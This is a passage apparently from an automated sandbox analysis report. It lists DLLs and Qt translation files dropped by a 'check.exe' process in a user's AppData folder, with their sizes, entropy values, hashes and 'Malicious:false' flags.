                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):25072
                                                                                                                                                                                                                                      Entropy (8bit):5.961464514165753
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
                                                                                                                                                                                                                                      MD5:BB00EF1DD81296AF10FDFA673B4D1397
                                                                                                                                                                                                                                      SHA1:773FFCF4A231B963BAAC36CBEF68079C09B62837
                                                                                                                                                                                                                                      SHA-256:32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
                                                                                                                                                                                                                                      SHA-512:C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):3385328
                                                                                                                                                                                                                                      Entropy (8bit):6.382356347494905
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
                                                                                                                                                                                                                                      MD5:2247EE4356666335DF7D72129AF8D600
                                                                                                                                                                                                                                      SHA1:F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
                                                                                                                                                                                                                                      SHA-256:50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
                                                                                                                                                                                                                                      SHA-512:67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):20923392
Entropy (8bit):6.255903817217008
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):68080
Entropy (8bit):6.207162014262433
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):41968
Entropy (8bit):6.0993566622860635
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):39408
Entropy (8bit):6.0316011626259405
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):45040
Entropy (8bit):6.016125225197622
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):38384
Entropy (8bit):5.957072398645384
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):421360
Entropy (8bit):5.7491063936821405
Encrypted:false
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):32240
                                                                                                                                                                                                                                      Entropy (8bit):5.978149408776758
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
                                                                                                                                                                                                                                      MD5:C0DE135782FA0235A0EA8E97898EAF2A
                                                                                                                                                                                                                                      SHA1:FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
                                                                                                                                                                                                                                      SHA-256:B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
                                                                                                                                                                                                                                      SHA-512:7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):31728
                                                                                                                                                                                                                                      Entropy (8bit):5.865766652452823
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
                                                                                                                                                                                                                                      MD5:A913276FA25D2E6FD999940454C23093
                                                                                                                                                                                                                                      SHA1:785B7BC7110218EC0E659C0E5ACE9520AA451615
                                                                                                                                                                                                                                      SHA-256:5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
                                                                                                                                                                                                                                      SHA-512:CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):390128
                                                                                                                                                                                                                                      Entropy (8bit):5.724665470266677
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
                                                                                                                                                                                                                                      MD5:9C0ACF12D3D25384868DCD81C787F382
                                                                                                                                                                                                                                      SHA1:C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
                                                                                                                                                                                                                                      SHA-256:825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
                                                                                                                                                                                                                                      SHA-512:45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):30192
                                                                                                                                                                                                                                      Entropy (8bit):5.938644231596902
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
                                                                                                                                                                                                                                      MD5:68919381E3C64E956D05863339F5C68C
                                                                                                                                                                                                                                      SHA1:CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
                                                                                                                                                                                                                                      SHA-256:0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
                                                                                                                                                                                                                                      SHA-512:6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):510448
                                                                                                                                                                                                                                      Entropy (8bit):6.605517748735854
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
                                                                                                                                                                                                                                      MD5:308E4565C3C5646F9ABD77885B07358E
                                                                                                                                                                                                                                      SHA1:71CB8047A9EF0CDB3EE27428726CACD063BB95B7
                                                                                                                                                                                                                                      SHA-256:6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
                                                                                                                                                                                                                                      SHA-512:FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):844784
                                                                                                                                                                                                                                      Entropy (8bit):6.625808732261156
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
                                                                                                                                                                                                                                      MD5:2F6D88F8EC3047DEAF174002228219AB
                                                                                                                                                                                                                                      SHA1:EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
                                                                                                                                                                                                                                      SHA-256:05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
                                                                                                                                                                                                                                      SHA-512:0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):754672
                                                                                                                                                                                                                                      Entropy (8bit):6.6323155845799695
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
                                                                                                                                                                                                                                      MD5:6407499918557594916C6AB1FFEF1E99
                                                                                                                                                                                                                                      SHA1:5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
                                                                                                                                                                                                                                      SHA-256:54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
                                                                                                                                                                                                                                      SHA-512:8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):482288
                                                                                                                                                                                                                                      Entropy (8bit):6.152380961313931
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
                                                                                                                                                                                                                                      MD5:1EDCB08C16D30516483A4CBB7D81E062
                                                                                                                                                                                                                                      SHA1:4760915F1B90194760100304B8469A3B2E97E2BC
                                                                                                                                                                                                                                      SHA-256:9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
                                                                                                                                                                                                                                      SHA-512:0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1477104
                                                                                                                                                                                                                                      Entropy (8bit):6.575113537540671
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
                                                                                                                                                                                                                                      MD5:4931FCD0E86C4D4F83128DC74E01EAAD
                                                                                                                                                                                                                                      SHA1:AC1D0242D36896D4DDA53B95812F11692E87D8DF
                                                                                                                                                                                                                                      SHA-256:3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
                                                                                                                                                                                                                                      SHA-512:0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):68592
                                                                                                                                                                                                                                      Entropy (8bit):6.125954940500008
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
                                                                                                                                                                                                                                      MD5:F66F6E9EDA956F72E3BB113407035E61
                                                                                                                                                                                                                                      SHA1:97328524DA8E82F5F92878F1C0421B38ECEC1E6C
                                                                                                                                                                                                                                      SHA-256:E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
                                                                                                                                                                                                                                      SHA-512:7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):144368
                                                                                                                                                                                                                                      Entropy (8bit):6.294675868932723
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
                                                                                                                                                                                                                                      MD5:53A85F51054B7D58D8AD7C36975ACB96
                                                                                                                                                                                                                                      SHA1:893A757CA01472A96FB913D436AA9F8CFB2A297F
                                                                                                                                                                                                                                      SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                                                      SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):130
                                                                                                                                                                                                                                      Entropy (8bit):4.024232093209084
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                                                      MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                                                      SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                                                      SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                                                      SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                                                      MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                                                      SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                                                      SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                                                      SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.631479835393124
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                                                      MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                                                      SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                                                      SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                                                      SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                                                      MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                                                      SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                                                      SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                                                      SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                                                      MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                                                      SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                                                      SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
                                                                                                                                                                                                                                      SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                                                      MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                                                      SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                                                      SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                                                      SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                                                      MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                                                      SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                                                      SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                                                      SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):293121
                                                                                                                                                                                                                                      Entropy (8bit):5.272179385890926
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                                                      MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                                                      SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                                                      SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                                                      SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
